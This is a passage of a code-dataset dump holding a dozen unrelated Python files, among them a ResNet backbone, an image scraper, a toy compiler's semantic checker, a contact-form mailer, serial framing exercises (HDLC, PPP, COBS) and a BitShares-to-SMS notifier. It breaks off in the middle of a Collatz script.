Linear\n children = list(resnet101.children())\n features = children[:-3]\n num_features_out = 1024\n\n hidden = children[-3]\n num_hidden_out = 2048\n\n for parameters in [feature.parameters() for i, feature in enumerate(features) if i <= 4]:\n for parameter in parameters:\n parameter.requires_grad = False\n\n features = nn.Sequential(*features)\n \n #print(features)\n\n return features, hidden, num_features_out, num_hidden_out\n","sub_path":"image/faster-rcnn-okvqa/backbone/resnet101.py","file_name":"resnet101.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"93674901","text":"import re\nimport requests\nimport os\nimport urllib.parse\n\nheader = {'content-type': 'application/json',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\nurl = \"http://soso.huitu.com/Search/GetAllPicInfo?perPageSize=102&kw={word}&page={num}\"\nword = input(\"请输入关键字:\")\nword = urllib.parse.quote(word)\nurls = [str(url).format(word=word, num=x) for x in range(1, 2)]\ni = 1\npath = \"./表情/\"\nif not os.path.exists(path):\n os.mkdir(path)\nfor url in urls:\n # print(url)\n html = requests.get(url).text\n\n # print(html)\n r = re.compile(r'\"imgUrl\":\"(.*?)\"')\n u = re.findall(r, html)\n\n for s in u:\n htmls = requests.get(s)\n print(\"正在下载第%s张图片\" % i)\n with open(path + str(i) + \".jpg\", 'wb')as f:\n f.write(htmls.content)\n i = i + 1","sub_path":"图片爬取/汇图网爬虫.py","file_name":"汇图网爬虫.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"38487741","text":"import csv\r\n\r\nlist_1 = []\r\nlist_2 = []\r\n\r\nwith open('bright_stars.csv', 'r') as f:\r\n data_read = csv.reader(f)\r\n for i in data_read:\r\n list_1.append(i)\r\n\r\nwith open('Clean_dwarf_stars.csv', 'r') as f:\r\n data_read = csv.reader(f)\r\n for i in data_read:\r\n list_2.append(i)\r\n\r\nheader1 = list_1[0]\r\nheader2 = list_2[0]\r\n\r\nplanet_data1 = list_1[1:]\r\nplanet_data2 = list_2[1:]\r\n\r\nheaders = header1+header2\r\n\r\nplanet_data = []\r\n\r\nfor index, row in enumerate(planet_data1):\r\n planet_data.append(planet_data1[index]+planet_data2[index])\r\n\r\nwith open('merged_data.csv', 'a+') as f:\r\n csv_writer = csv.writer(f)\r\n csv_writer.writerow(headers)\r\n csv_writer.writerows(planet_data)","sub_path":"Merging.py","file_name":"Merging.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"45939937","text":"import unittest\n\nfrom table import PhoneBookTable\n\nclass PhoneBookTableTest(unittest.TestCase):\n def setUp(self):\n self.table = PhoneBookTable()\n\n def test_get_table(self):\n items = [\n { 'id': 1, 'name': 'Mike', 'phone': '567' },\n { 'id': 2, 'name': 'Bobby', 'phone': '890' }\n ]\n result = self.table.get_table(items)\n\n self.assertIsInstance(result, str)\n for item in items:\n self.assertIn(str(item['id']), result)\n self.assertIn(item['name'], result)\n self.assertIn(item['phone'], result)","sub_path":"python/phone-book/table/table_test.py","file_name":"table_test.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"170152551","text":"from anytree import Node, RenderTree\nfrom anytree.exporter import DotExporter\n\nfrom yacc_tzora import arvore, tabela, tem_erro_yacc\nimport poda_arvore_tzora as poda\n\n\"\"\"\ntratar tipo indice vetor e intervalo\ntratar tipo coersao atribuição\ntratar função duplicada\narrumar atribuição por leia\n\"\"\"\n\n\n# =========================\n# === Variáveis Globais ===\n# =========================\n# Guarda mensagens da varredura\nlista_mensagens = []\n# Guarda escopo percorrido no momento\nescopo = \"global\"\n# Guarda 0 quando não há erros e -1 quando há erros\ntem_erros = [0]\n\n# ==========================\n# === Funções Auxiliares ===\n# ==========================\n# Retorna se x exite em alguma regra dada\ndef estaContido(regra, pos, x, opcao=None):\n\tfor i in tabela:\n\t\tif (i[0] == regra):\n\t\t\tif (opcao == None and i[pos] == x):\n\t\t\t\treturn True\n\t\t\t# Verifica a regra em um escopo específico\n\t\t\telif (opcao != None and i[pos] == x and (i[5] == opcao or i[5] == \"global\")):\n\t\t\t\treturn True\n\treturn False\n\n# Retorna a linha de x\ndef getLinha(regra, pos, x, opcao=None):\n\tfor i in range (len(tabela)):\n\t\tif (tabela[i][0] == regra):\n\t\t\tif (opcao == None and tabela[i][pos] == x):\n\t\t\t\treturn i\n\t\t\t# Devolve posição de x em um escopo específico\n\t\t\telif (opcao != None and tabela[i][pos] == x and (tabela[i][5] == opcao or tabela[i][5] == \"global\")):\n\t\t\t\treturn i\n\treturn -1\n\n# Retorna a linha de x, sem considerar a opção \"global\" para o escopo\ndef getLinhaEspecifico(regra, pos, x, opcao=None):\n\tfor i in range (len(tabela)):\n\t\tif (tabela[i][0] == regra):\n\t\t\tif (opcao == None and tabela[i][pos] == x):\n\t\t\t\treturn i\n\t\t\t# Devolve posição de x em um escopo específico\n\t\t\telif (opcao != None and tabela[i][pos] == x and (tabela[i][5] == opcao)):\n\t\t\t\treturn i\n\treturn -1\n\n\n# Retorna se x é parâmetro da função \"escopo\"\ndef serParametroDaFuncao(escopo, x):\n\tpos = getLinhaEspecifico(\"FUNCAO\", 1, escopo)\n\tlista_var = tabela[pos][8][1]\n\tfor i in range (1,len(lista_var)):\n\t\tif (x == lista_var[i]):\n\t\t\treturn True\n\treturn False\n\n\n# Verifica se a função Principal existe\ndef hasPrincipal():\n\thas = False\n\tfor i in tabela:\n\t\tif (\"principal\" in i):\n\t\t\thas = True\n\treturn has\n\n\n# ====================================\n# === Funções de Análise Semantica ===\n# ====================================\n# Percorre árvore em profundidade\ndef percorreArvore(no_atual):\n\t#print(no_atual.name)\n\tglobal escopo\n\t# ------------------\n\t# --- Trata o nó ---\n\t# ------------------\n\n\t# Define escopo (ao entrar na função)\n\tif (\"declaracao_funcao/\" in no_atual.name):\n\t\tescopo = no_atual.children[1].children[0].valor[0]\n\n\t# Trata retorno da função\n\tif (\"retorna/\" in no_atual.name):\n\t\tif (not (no_atual.leaves[0].tipo[0] == \"numero\")):\n\t\t\tvar_retorno = no_atual.leaves[0].valor[0]\n\t\t\tpos_var_retorno = getLinhaEspecifico(\"VARIAVEL\", 1, var_retorno, opcao=escopo)\n\t\t\ttabela[pos_var_retorno][7] = 1 # Declara que a variável foi utilizada\n\t\t\tif ( (pos_var_retorno == -1) and (not serParametroDaFuncao(escopo, var_retorno)) ):\n\t\t\t\tmensagem = \"ERROR: variável \" + var_retorno + \" está sendo usada, mas não foi declarada em \" + escopo + \".\"\n\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\tprint(mensagem)\n\t\t\t\treturn -1\n\t\t\telse:\n\t\t\t\tpos_escopo = getLinha(\"FUNCAO\", 1, escopo)\n\t\t\t\tif (tabela[pos_var_retorno][2] != tabela[pos_escopo][2]):\n\t\t\t\t\tmensagem = \"ERROR: variável de retorno da função \" + escopo + \" é do tipo \" + tabela[pos_var_retorno][2] + \", mas o tipo esperado é \" + tabela[pos_escopo][2] + \".\"\n\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\tprint(mensagem)\n\t\t\t\t\treturn -1\n\t\n\t# Trata chamada função\n\tif (\"chamada_funcao/\" in no_atual.name):\n\t\tnome_func = no_atual.valor[0] #Nome função chamada\n\t\t# Encontra a definição da função chamada\n\t\tpos_definicao = getLinha(\"FUNCAO\", 1, nome_func)\n\t\tpos_escopo = getLinha(\"FUNCAO\", 1, escopo)\n\n\t\tif ( pos_definicao == -1):\n\t\t\tmensagem = \"ERROR: função \" + nome_func + \" chamada na função \" + escopo + \" não existe.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\t\treturn -1\n\t\telif ( (escopo == \"principal\") and (nome_func == \"principal\") ):\n\t\t\tmensagem = \"WARNING: chamada recursiva para a função principal.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\telif (nome_func == \"principal\"):\n\t\t\tmensagem = \"ERROR: chamada para a função principal não permitida.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\t\treturn -1\n\n\t\t# === Olha o tipo dos parâmetros das funções ===\n\t\t# Encontra as chamadas funções\n\t\testa_correto = False # Auxiliar para verificar se existe chamada compatível com os tipo da declaração da função\n\t\tfor j in range (1, len(tabela)):\n\t\t\t# tabela[pos_definicao] é a declaração da função, tabela[j] é a chamada da função\n\t\t\tif (tabela[j][0] == \"CHAMADA\" and tabela[j][1] == tabela[pos_definicao][1]):\n\n\t\t\t\t# ... Preenche tipo dos parâmetros das chamadas de função ...\n\t\t\t\t# ... * Passo necessário, pois na sintática não preenche tipo de parâmetros ...\n\t\t\t\tif ( (len(tabela[j][8][1]) > 1) and tabela[j][8][0][1] == \"\"): # Testa se os tipos estão vazios\n\t\t\t\t\tfor k in range (len(tabela[j][8][1])-1):\n\t\t\t\t\t\texiste_escopo_local = getLinhaEspecifico(\"VARIAVEL\", 1, tabela[j][8][1][k+1], opcao=tabela[pos_escopo][1]) # Testa se cada variável da chamada foi criada localmente\n\t\t\t\t\t\tif (existe_escopo_local != -1):\n\t\t\t\t\t\t\ttabela[j][8][0][k+1] = tabela[existe_escopo_local][2] # Atribui o tipo para o parâmetro\n\t\t\t\t\t\t\ttabela[existe_escopo_local][7] = 1 # Declara que a variável foi utilizada\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\texiste_escopo_global = getLinhaEspecifico(\"VARIAVEL\", 1, tabela[j][8][1][k+1], opcao=\"global\") # Testa se cada variável da chamada foi criada globalmente\n\t\t\t\t\t\t\tif (existe_escopo_global != -1):\n\t\t\t\t\t\t\t\ttabela[j][8][0][i+1] = tabela[existe_escopo_global][2] # Atribui o tipo para o parâmetro\n\t\t\t\t\t\t\t\ttabela[existe_escopo_global][7] = 1 # Declara que a variável foi utilizada\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tmensagem = \"ERROR: Variável \" + tabela[j][8][1][k+1] + \" passada como parâmetro da função \" + tabela[j][1] + \" chamada na função \" + escopo + \" não foi declarada.\"\n\t\t\t\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\t\t\t\tprint(mensagem)\n\t\t\t\t\t\t\t\treturn -1\n\n\t\t\t\t# ... Preenchidos os tipo, verifica se estão corretos ...\n\t\t\t\tfor k in range (len(tabela[j][8][0])-1):\n\t\t\t\t\tif (tabela[j][8][0][k+1] != tabela[pos_definicao][8][0][k+1]) :\n\t\t\t\t\t\tmensagem = \"WARNING: Variável \" + tabela[j][8][1][k+1] + \" passada como parâmetro da função \" + tabela[j][1] + \" chamada na função \" + escopo + \" é do tipo \" + tabela[j][8][0][k+1] + \" e o tipo esperado é \" + tabela[pos_definicao][8][0][k+1] + \".\"\n\t\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\t\tprint(mensagem)\n\n\t# Trata atribuições\n\tif (\"atribuicao/\" in no_atual.name):\n\t\tvar = no_atual.children[0].children[0].valor[0]\n\t\tif ( (not estaContido(\"VARIAVEL\", 1, var, escopo)) and (not serParametroDaFuncao(escopo, var))):\n\t\t\tmensagem = \"ERROR: variável \" + var + \" está sendo usada, mas não foi declarada em \" + escopo + \".\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\t\t\treturn -1\n\t\telse: # Registra que a variável foi inicializada\n\t\t\tpos = getLinha(\"VARIAVEL\", 1, var, escopo)\n\t\t\ttabela[pos][6] = 1\n\n\t\t# Percorre fatores da atribuição\n\t\tfolhas = no_atual.children[1].leaves\n\t\tfor j in folhas:\n\t\t\tpos = getLinha(\"VARIAVEL\", 1, j.valor[0], escopo)\n\t\t\tif ( pos != -1):\n\t\t\t\ttabela[pos][7] = 1 # Registra que a variável foi utilizada\n\t\t\t\tif (tabela[pos][6] == 0):\n\t\t\t\t\tmensagem = \"ERROR: variável \" + j.valor[0] + \" está sendo usada, mas não foi inicializada.\"\n\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\tprint(mensagem)\n\t\t\t\t\treturn -1\n\n\t# Percorre filhos\n\tfor i in no_atual.children:\n\t\thasError = percorreArvore(i)\n\t\tif (hasError == -1):\n\t\t\treturn -1\n\n\t# Defina escopo (ao sair da função)\n\tif (\"declaracao_funcao/\" in no_atual.name):\n\t\t#global escopo\n\t\tescopo = \"global\"\n\n\n\n# Faz varredura semântica\ndef varre_semantica():\n\tglobal lista_mensagens\n\tdeclaradas = [] # Armazena nome das variaveis declaradas\n\trepeticoes = [] # Armazena elementos repetidos, para a exclusão\n\t#print(tabela)\n\n\t# === Tem função principal ===\n\tif (not hasPrincipal()):\n\t\tmensagem = \"ERROR: Programa não tem função principal.\"\n\t\tlista_mensagens.append(mensagem)\n\t\tprint(mensagem)\n\t\treturn -1\n\n\t# Percorre tabela de símbolos\n\tfor i in range (len(tabela)):\n\n\t\t# === Verifica se uma variável foi declarada mais de uma vez ===\n\t\tif (tabela[i][0] == \"VARIAVEL\"):\n\t\t\tif (((tabela[i][1]+tabela[i][5]) in declaradas) or ((tabela[i][1]+\"global\") in declaradas)):\n\t\t\t\tmensagem = \"WARNING: Variável \" + tabela[i][1] + \" na linha \" + str(tabela[i][7]) + \" já foi declarada.\"\n\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\tprint(mensagem)\n\t\t\t\trepeticoes.append(i)\n\t\t\telse:\n\t\t\t\tdeclaradas.append(tabela[i][1]+tabela[i][5])\n\n\t\t# === Olha quantidades de parâmetros das funções ===\n\t\t# Encontra as funções\n\t\tif (tabela[i][0] == \"FUNCAO\"):\n\n\t\t\t# Encontra as chamadas funções\n\t\t\tfor j in range (len(tabela)):\n\t\t\t\t# tabela[i] é a declaração da função, tabela[j] é a chamada da função\n\t\t\t\tif (tabela[j][0] == \"CHAMADA\" and tabela[j][1] == tabela[i][1]):\n\t\t\t\t\t# Compara se o num de parametros é o mesmo\n\t\t\t\t\tif (len(tabela[i][8][1]) != len(tabela[j][8][1])):\n\t\t\t\t\t\t\t\tmensagem = \"ERROR: A função \" + tabela[i][1] + \" deve ter \" + str(len(tabela[i][8][1]) - 1) + \" parâmetros e ela foi chamada com \" + str(len(tabela[j][8][1]) - 1) + \" parâmetros.\"\n\t\t\t\t\t\t\t\tlista_mensagens.append(mensagem)\n\t\t\t\t\t\t\t\tprint(mensagem)\n\t\t\t\t\t\t\t\treturn -1\n\n\t# === Remove repeticoes ===\n\tfor i in repeticoes:\n\t\ttabela.pop(i)\n\n\t# === Percorre Árvore ===\n\thasError = percorreArvore(arvore)\n\tif (hasError == -1):\n\t\treturn -1\n\n\t# === Verifica a inicialização e utilização das variáveis ===\n\tfor i in range (1, len(tabela)):\n\t\t# === Verifica se as variáveis foram inicializadas ===\n\t\tif (tabela[i][0] == \"VARIAVEL\" and tabela[i][6] == 0):\n\t\t\tmensagem = \"WARNING: Variável \" + tabela[i][1] + \" na linha \" + str(tabela[i][9]) + \" foi declarada mas não inicializada.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\n\t\t# === Verifica se as variáveis foram utilizadas ===\n\t\tif (tabela[i][0] == \"VARIAVEL\" and tabela[i][7] == 0):\n\t\t\tmensagem = \"WARNING: Variável \" + tabela[i][1] + \" na linha \" + str(tabela[i][9]) + \" foi declarada mas nunca utilizada.\"\n\t\t\tlista_mensagens.append(mensagem)\n\t\t\tprint(mensagem)\n\n\n\n\t#print(tabela)\n\n# Chama varedura\nif not tem_erro_yacc:\n\ttem_erros[0] = varre_semantica()\n\n# Poda árvore\npoda.poda_arvore(arvore)\n#DotExporter(arvore).to_dotfile(\"arvore_podada.dot\")\nDotExporter(arvore).to_picture(\"arvore_podada.png\")\n#print(\"Para ver a imagem do grafo em PNG rode \\\" dot -Tpng -O arvore_podada.dot \\\".\")\n\n\n","sub_path":"semantica.py","file_name":"semantica.py","file_ext":"py","file_size_in_byte":10683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"180132082","text":"import torch\nimport random\nimport tifffile\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom Utils.Dataloader import Dataloader\nfrom Utils.Helpers import *\nfrom pathlib import Path\nfrom Utils.Metrics import *\n\n\n# Params:\nparams = dict(num_categories=2, pretrained_on=None, num_epochs=100,\n device=torch.device('cuda' if torch.cuda.is_available() else 'cpu'))\nmodel_path = Path('experiments/experiment_2/cbam_unet_32-512_wDeepSupervision_136.pt')\ndataloader_path = Path('tmp/Dataloader_SN1_Buildings.pkl')\nnum_image = 207\nmode = 'test'\n\n# Visualize:\nrandom.seed(42)\nnp.random.seed(42)\ndataloader = Dataloader()\ndataloader.load(dataloader_path)\ndataloader.on_epoch_start(params)\ntry:\n model = torch.load(model_path)\nexcept RuntimeError as e:\n model = torch.load(model_path, map_location=lambda storage, loc: storage)\nmodel.eval()\nif mode == 'train':\n obj = dataloader.train_objs[num_image]\nelif mode == 'val':\n obj = dataloader.val_objs[num_image]\nelif mode == 'test':\n obj = dataloader.test_objs[num_image]\nX, Y = dataloader.get_mini_batch(num_image, params, mode=mode, data_augmentation=False, weight=False)\nout = model(X, save_attention=True)\n\n# spatial:\nfig = plt.figure(figsize=(20, 10), dpi=100)\ntensor_paths_spatial = [p for p in Path('tmp').iterdir() if 'cbam-attention_spatial_' in p.name]\ntensor_paths_spatial.sort(key=lambda p:torch.load(p).shape[-2], reverse=True)\nfor i, tensor_path in enumerate(tensor_paths_spatial):\n attention_map = torch.load(tensor_path).to('cpu').detach().numpy()\n _, _, h_att, w_att = attention_map.shape\n attention_map = attention_map.reshape((h_att, w_att))\n ax = fig.add_subplot(int(f'22{i + 1}'))\n ax.set_title(f'spatial attention map {i + 1}')\n assert np.max(attention_map) <= 1.0 and np.min(attention_map) >= 0.0\n # att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=0.0, vmax=1.0)\n att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=np.min(attention_map), vmax=np.max(attention_map))\n x0, y0, width, height = ax.get_position().bounds\n cbaxes = fig.add_axes([x0 + width + .01, y0, .01, height])\n cb = plt.colorbar(att, cax=cbaxes)\n ax.set_xticks([])\n ax.set_yticks([])\nplt.show()\n\n# channel:\nfig = plt.figure(figsize=(20, 10), dpi=100)\ntensor_paths_channel = [p for p in Path('tmp').iterdir() if 'cbam-attention_channel_' in p.name]\ntensor_paths_channel.sort(key=lambda p:torch.load(p).shape[1], reverse=False)\nbounds = []\nfor i, tensor_path in enumerate(tensor_paths_channel):\n attention_map = torch.load(tensor_path).to('cpu').detach().numpy()\n _, ch_att, _, _ = attention_map.shape\n attention_map = attention_map.reshape((1, ch_att))\n ax = fig.add_subplot(int(f'41{i + 1}'))\n bounds.append(ax.get_position().bounds)\n ax.set_title(f'channel attention map {i + 1}')\n assert np.max(attention_map) <= 1.0 and np.min(attention_map) >= 0.0\n # att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=0.0, vmax=1.0)\n att = ax.imshow(attention_map, cmap='plasma', alpha=1.0, vmin=np.min(attention_map), vmax=np.max(attention_map))\n # ax.set_xticks([])\n ax.set_yticks([])\ncbaxes = fig.add_axes([bounds[-1][0] + bounds[-1][2] + .03, .25, .01, .5])\ncb = plt.colorbar(att, cax=cbaxes)\nplt.show()\nprint(str(model_path.absolute()))\n\n# clean up:\nfor tensor_path in tensor_paths_spatial + tensor_paths_channel:\n os.remove(str(tensor_path.absolute()))\n","sub_path":"visualize_cbam_spatial_and_channel.py","file_name":"visualize_cbam_spatial_and_channel.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"607716088","text":"class Solution:\n def removeElement(self, nums, val):\n \"\"\"\n :type nums: List[int]\n :type val: int\n :rtype: int\n \"\"\"\n \n pos = 0\n\n while pos < len(nums):\n num = nums[pos]\n if num == val:\n del nums[pos]\n pos+=1\n\n return len(nums)","sub_path":"leetcode/remove_ele.py","file_name":"remove_ele.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"476716071","text":"from core.app import app\nfrom core.email import email\nfrom core.functions import functions\n\nfrom .base import base\n\nfrom email.utils import parseaddr\nimport urllib.request\nimport json\n\n\nclass enviar(base):\n def index(self):\n ret = {\n \"headers\": [(\"Content-Type\", \"application/json charset=utf-8\")],\n \"body\": \"\",\n }\n campos = app.post[\"campos\"]\n respuesta = {\"exito\": True, \"mensaje\": \"\"}\n nombre_sitio = app.title\n config = app.get_config()\n secret = config[\"google_captcha_secret\"]\n email_empresa = config[\"main_email\"]\n\n if campos[\"nombre\"] == \"\":\n respuesta[\"mensaje\"] += \"Error!  Nombre vacío.
\"\n\n if campos[\"email\"] == \"\":\n respuesta[\"mensaje\"] += \"Error!  Email vacío.
\"\n elif \"@\" not in parseaddr(campos[\"email\"])[1]:\n respuesta[\"mensaje\"] += \"Error!  Email no valido.
\"\n\n if campos[\"mensaje\"] == \"\":\n respuesta[\"mensaje\"] += \"Error!  Mensaje vacío.
\"\n\n if \"g-recaptcha-response\" not in campos or campos[\"g-recaptcha-response\"] == \"\":\n respuesta[\n \"mensaje\"\n ] += \"Error!  Error en captcha. Por favor completa el captcha.
\"\n respuesta[\"captcha\"] = True\n\n if respuesta[\"mensaje\"] != \"\":\n respuesta[\"exito\"] = False\n\n if respuesta[\"exito\"]:\n url = \"https://www.google.com/recaptcha/api/siteverify?secret={}&response={}&remoteip={}\"\n url = url.format(secret, campos[\"g-recaptcha-response\"], app.client_ip)\n\n file = urllib.request.urlopen(url)\n captcha = json.loads(file)\n respuesta[\"exito\"] = captcha[\"success\"]\n if not respuesta[\"exito\"]:\n respuesta[\n \"mensaje\"\n ] = \"Error!  Error en captcha. Por favor completa el captcha.\"\n\n respuesta[\"captcha\"] = True\n del campos[\"g-recaptcha-response\"]\n\n if respuesta[\"exito\"]:\n body_email = {\n \"template\": \"contacto\",\n \"titulo\": \"Formulario de \" + campos[\"titulo\"],\n \"cabecera\": \"Estimado {}, hemos recibido su correo, el cual será respondido a la brevedad por el centro de atención al cliente de {}\".format(\n campos[\"nombre\"], nombre_sitio\n ),\n }\n titulo = campos[\"titulo\"]\n body_email[\"campos_largos\"] = {\n \"Mensaje\": campos[\"mensaje\"].replace(\"\\n\", \"
\\n\")\n }\n del campos[\"accion\"]\n del campos[\"titulo\"]\n del campos[\"mensaje\"]\n body_email[\"campos\"] = campos\n imagenes = []\n\n adjuntos = []\n if \"file\" in app.post:\n for file in app.post[\"file\"]:\n adjuntos.append(\n {\"archivo\": file[\"tmp_name\"], \"nombre\": file[\"name\"]}\n )\n\n body = email.body_email(body_email)\n respuesta = email.enviar_email(\n [campos[\"email\"], email_empresa],\n \"Formulario de \" + titulo,\n body,\n adjuntos,\n imagenes,\n )\n\n if respuesta[\"exito\"]:\n respuesta[\n \"mensaje\"\n ] = \"Gracias!  Email enviado correctamente.\"\n respuesta[\"captcha\"] = True\n else:\n respuesta[\"mensaje\"] = (\n \"Error!  No se puede enviar el email, por favor intente más tarde.
\"\n + respuesta[\"mensaje\"]\n )\n respuesta[\"captcha\"] = True\n\n ret[\"body\"] = json.dumps(respuesta, ensure_ascii=False)\n return ret\n\n","sub_path":"app/controllers/front/themes/jycdesayunos/enviar.py","file_name":"enviar.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"269007693","text":"from bitstring import BitArray\n\ndef HDLC(input):\n oseq = BitArray('0x7e')\n bits_in_a_row = 0\n\n for bit in input:\n oseq.append('0b1' if bit else '0b0')\n\n if bit:\n bits_in_a_row += 1\n else:\n bits_in_a_row = 0\n\n if bits_in_a_row == 5:\n oseq.append('0b0')\n bits_in_a_row = 0\n\n oseq.append('0x7e')\n return oseq\n\ndef as_bytes(lst):\n i = iter(lst)\n while True:\n x = next(i)\n y = next(i)\n yield '0x' + x + y\n\ndef PPP(input):\n oseq = BitArray('0x7e')\n \n for byte in as_bytes(input.hex):\n if byte == '0x7e':\n oseq.append('0x7d, 0x5e')\n elif byte == '0x7d':\n oseq.append('0x7d, 0x5d')\n else:\n oseq.append(byte)\n\n oseq.append('0x7e')\n return oseq\n\ndef COBS(input):\n oseq = BitArray('0x00')\n\n def next_nonzero(input):\n nonzero = []\n count = 1\n for byte in as_bytes(input.hex):\n if byte == '0x00':\n yield '0x{:02x}'.format(count)\n count = 1\n else:\n count += 1\n yield '0x{:02x}'.format(count)\n\n gen = next_nonzero(input)\n\n oseq.append(next(gen))\n for byte in as_bytes(input.hex):\n if byte == '0x00':\n oseq.append(next(gen))\n else:\n oseq.append(byte)\n\n oseq.append('0x00')\n return oseq\n\nif __name__ == '__main__':\n test1 = BitArray('0x00, 0x01, 0x02, 0xFF, 0x7E, 0x7D, 0x00, 0x00, 0x7D, 0xFD, 0x7E')\n test2 = BitArray('0x02, 0x00, 0x01, 0x02, 0x7D, 0x00')\n\n print('test 1:', end=' ')\n for byte in as_bytes(test1.hex):\n print(byte, end=' ')\n print()\n print('test 2:', end=' ')\n for byte in as_bytes(test2.hex):\n print(byte, end=' ')\n print()\n\n print()\n\n print('HDLC:')\n print('test 1:', end=' ')\n for i, b in enumerate(HDLC(test1).bin, 1):\n print(b, end='')\n if i % 8 == 0:\n print('', end=' ')\n print()\n print('test 2:', end=' ')\n for i, b in enumerate(HDLC(test2).bin, 1):\n print(b, end='')\n if i % 8 == 0:\n print('', end=' ')\n\n print()\n\n print('PPP:')\n print('test 1:', end=' ')\n for byte in as_bytes(PPP(test1).hex):\n print(byte, end=' ')\n print()\n print('test 2:', end=' ')\n for byte in as_bytes(PPP(test2).hex):\n print(byte, end=' ')\n print()\n\n print()\n\n print('COBS:')\n print('test 1:', end=' ')\n for byte in as_bytes(COBS(test1).hex):\n print(byte, end=' ')\n print()\n print('test 2:', end=' ')\n for byte in as_bytes(COBS(test2).hex):\n print(byte, end=' ')\n print()\n","sub_path":"hw8/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"247001419","text":"def min_dist(D1: [float], D2: [float]) -> float:\n \"\"\"\n Time complexity: O(NlogM)\n \"\"\"\n if D1 == None or D2 == None or len(D1) == 0 or len(D2) == 0:\n return 0\n if len(D1) < len(D2):\n temp = D1\n D1 = D2\n D2 = temp\n\n D2 = sorted(D2)\n res = float('inf')\n for x in D1:\n start, end = 0, len(D2) - 1\n while start < end:\n mid = int(start + (end - start) / 2)\n if D2[mid] < x:\n start = mid + 1\n else:\n end = mid\n dist = abs(D2[start] - x) if start < len(D2) else float('inf')\n dist = min(dist, abs(D2[start - 1] - x)) if start > 0 else dist\n res = min(res, dist)\n return res\n\nif __name__ == '__main__':\n assert min_dist([1, 2, 3, 4], [1, 2, 3, 4]) == 0\n assert min_dist([1, 3, 5, 7, 9], [2, 6, 8]) == 1\n assert min_dist([5, 1.2, 8], [-3, 2, 6]) == 0.8\n assert min_dist([5, 1, 8.7], [-3, 2, 6]) == 1\n assert min_dist([5, -1.2, 8], [float('inf')]) == float('inf')\n assert min_dist([5, -1.2, 8], [-float('inf')]) == float('inf')\n assert min_dist([-float('inf')], [-float('inf')]) == float('inf')\n\n","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596211870","text":"from pprint import pprint\nfrom bitshares.account import Account\nfrom bitshares.blockchain import Blockchain\nfrom bitshares.asset import Asset\nfrom bitshares import BitShares\nfrom twilio.rest import Client\n\n# User Inputs\nACCOUNT_WATCHING = ''\nBOT_PHONE_NUMBER = ''\nYOUR_PHONE_NUMBER = ''\n\naccount_sid = ''\nauth_token = ''\nclient = Client(account_sid, auth_token)\n\nbitshares = BitShares(\n node=[\n \"wss://na.openledger.info/ws\",\n \"wss://kc-us-dex.xeldal.com/ws\"\n ]\n )\n\nblockchain = Blockchain(\n blockchain_instance=bitshares,\n mode='head'\n)\n\nfor op in blockchain.stream(['transfer']):\n payee = Account(op['to']).name\n if payee == ACCOUNT_WATCHING:\n from_account = Account(op['from']).name\n asset_symbol = Asset(op['amount']['asset_id']).symbol\n asset_precision = int(Asset(op['amount']['asset_id']).precision)\n amount = int(op['amount']['amount']) / (10**asset_precision)\n Asset.clear_cache()\n body = '{} sent {} {} {} in block {}.'.format(\n from_account,\n payee,\n amount,\n asset_symbol,\n op['block_num']\n )\n message = client.messages.create(\n body=body,\n from_=BOT_PHONE_NUMBER,\n to=YOUR_PHONE_NUMBER\n )\n pprint(message.sid) \n Account.clear_cache()\n","sub_path":"bitshares_transfer_text.py","file_name":"bitshares_transfer_text.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"213722198","text":"def next(n):\n if n % 2 == 0:\n return n // 2\n else:\n return 3 * n + 1\n\ndef length(x):\n global history\n k = 1\n aux = x\n while aux != 1:\n aux = next(aux)\n if aux in history:\n k += history[aux]\n break\n k += 1\n history[x] = k\n return k\n\nn = -1\nmaxl = -1\nhistory = {}\nfor i in range(1, 1000000):\n l = 